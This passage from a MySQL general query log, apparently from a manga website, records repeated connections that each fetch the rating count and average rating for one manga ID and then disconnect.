total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330645133 Quit 330645134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330645134 Quit 330645135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330645135 Quit 330645136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330645136 Quit 330645137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330645137 Quit 330645138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330645138 Quit 330645139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330645139 Quit 330645140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330645140 Quit 330645141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330645141 Quit 330645142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330645142 Quit 330645143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330645143 Quit 330645144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330645144 Quit 330645145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330645145 Quit 330645146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330645146 Quit 330645147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330645147 Quit 330645148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330645148 Quit 330645149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330645149 Quit 330645150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330645150 Quit 330645151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330645151 Quit 330645152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330645152 Quit 330645153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330645153 Quit 330645154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330645154 Quit 330645155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330645155 Quit 330645156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330645156 Quit 330645157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330645157 Quit 330645158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330645158 Quit 330645159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330645159 Quit 330645160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330645160 Quit 330645161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330645161 Quit 330645162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330645162 Quit 330645163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330645163 Quit 330645164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330645164 Quit 330645165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330645165 Quit 330645166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330645166 Quit 330645167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330645167 Quit 330645168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330645168 Quit 330645169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330645169 Quit 330645170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330645170 Quit 330645171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330645171 Quit 330645172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330645172 Quit 330645173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330645173 Quit 330645174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330645174 Quit 330645175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330645175 Quit 330645176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330645176 Quit 330645177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330645177 Quit 330645178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330645178 Quit 330645179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330645179 Quit 330645180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330645180 Quit 330645181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330645181 Quit 330645182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330645182 Quit 330645183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330645183 Quit 330645184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330645184 Quit 330645185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330645185 Quit 330645186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330645186 Quit 330645187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330645187 Quit 330645188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330645188 Quit 330645189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330645189 Quit 330645190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330645190 Quit 330645191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330645191 Quit 330645192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330645192 Quit 330645193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330645193 Quit 330645194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330645194 Quit 330645195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330645195 Quit 330645196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330645196 Quit 330645197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330645197 Quit 330645198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330645198 Quit 330645199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330645199 Quit 330645200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330645200 Quit 330645201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330645201 Quit 330645202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330645202 Quit 330645203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330645203 Quit 330645204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330645204 Quit 330645205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330645205 Quit 330645206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330645206 Quit 330645207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330645207 Quit 330645208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330645208 Quit 330645209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330645209 Quit 330645210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330645210 Quit 330645211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330645211 Quit 330645212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330645212 Quit 330645213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330645213 Quit 330645214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330645214 Quit 330645215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330645215 Quit 330645216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330645216 Quit 330645217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330645217 Quit 330645218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330645218 Quit 330645219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330645219 Quit 330645220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330645220 Quit 330645221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330645221 Quit 330645222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330645222 Quit 330645223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330645223 Quit 330645224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330645224 Quit 330645225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330645225 Quit 330645226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330645226 Quit 330645227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330645227 Quit 330645228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330645228 Quit 330645229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330645229 Quit 330645230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330645230 Quit 330645231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330645231 Quit 330645232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330645232 Quit 330645233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330645233 Quit 330645234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330645234 Quit 330645235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330645235 Quit 330645236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330645236 Quit 330645237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330645237 Quit 330645238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330645238 Quit 330645239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330645239 Quit 330645240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330645240 Quit 330645241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330645241 Quit 330645242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330645242 Quit 330645243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330645243 Quit 330645244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330645244 Quit 330645245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330645245 Quit 330645246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330645246 Quit 330645247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330645247 Quit 330645248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330645248 Quit 330645249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330645249 Quit 330645250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330645250 Quit 330645251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330645251 Quit 330645252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330645252 Quit 330645253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330645253 Quit 330645254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330645254 Quit 330645255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330645255 Quit 330645256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330645256 Quit 330645257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330645257 Quit 330645258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330645258 Quit 330645259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330645259 Quit 330645260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330645260 Quit 330645261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330645261 Quit 330645262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330645262 Quit 330645263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330645263 Quit 330645264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330645264 Quit 330645265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330645265 Quit 330645266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330645266 Quit 330645267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330645267 Quit 330645268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330645268 Quit 330645269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330645269 Quit 330645270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330645270 Quit 330645271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330645271 Quit 330645272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330645272 Quit 330645273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330645273 Quit 330645274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330645274 Quit 330645275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330645275 Quit 330645276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330645276 Quit 330645277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330645277 Quit 330645278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330645278 Quit 330645279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330645279 Quit 330645280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330645280 Quit 330645281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330645281 Quit 330645282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330645282 Quit 330645283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330645283 Quit 330645284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330645284 Quit 330645285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330645285 Quit 330645286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645286 Query select count(id) as total_rating, 